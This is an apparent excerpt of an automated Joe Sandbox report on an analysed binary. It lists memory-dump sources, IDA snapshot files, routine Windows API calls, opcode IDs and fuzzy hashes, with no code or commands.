                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                                                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: BG3i@
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2407888476
                                                                                                                                                                                                                                                                                                                              • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1d57165ebf75e2395586178747a5147ed71ba924114eacc5dbe4d8b8235841a2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF615771600605AADB386A2898D6BBF63A6EB4D718F10391BE543FB3C1D71DDD42831E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b96fbfb60640764a27c773ebaff073e85ef5750e910638ac9767c22e4461be8a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 485168716006045BDB34466885DA7BF6B959B0E704F18352FE48AFB382C61EEE02975E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-1296849874
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 661f8dc1abccfe97b5e643cefb8d9ec9f9f07c15d965e7528ef90cccb633838c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 336422a7085196201aa282f05720e8470f05034f91c22384aa2eabef4bec5ef2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 661f8dc1abccfe97b5e643cefb8d9ec9f9f07c15d965e7528ef90cccb633838c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE6288316183A58FD325CF28C48465ABBF1FF89385F118A2DE9E58B360E731D949CB42
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ab2fb9cf530b2f7fc05e48a1b2542d0b548931935014995ce621e12a70c45bd8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6324621D29F414DE7639634C862336A649AFB73C5F18D737E81AB5AAAEF2CC4C34105
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 56ea352148e3c774f87dcc4cf0de5d49bee8f4798448973f894b3d9cfc24b1ba
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 00ae404e09403cbabe28ca0a0a4d3aceb2ea5bd9e999d2a250848967357f0a7a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56ea352148e3c774f87dcc4cf0de5d49bee8f4798448973f894b3d9cfc24b1ba
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E532E3796083469BD714CF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 63c6752c91fa09a59911cbec739b695d928ea4d41f79e3f210d04f564ca51bf4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9583adf114605d02d5e2e19679ce9bf42d3b47f395d82ba1fcfe18c7509b5e77
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63c6752c91fa09a59911cbec739b695d928ea4d41f79e3f210d04f564ca51bf4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59028E717046518FD318CF2EE880536B7E1AF8E301B46867EE586C7391EB34E922CB95
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
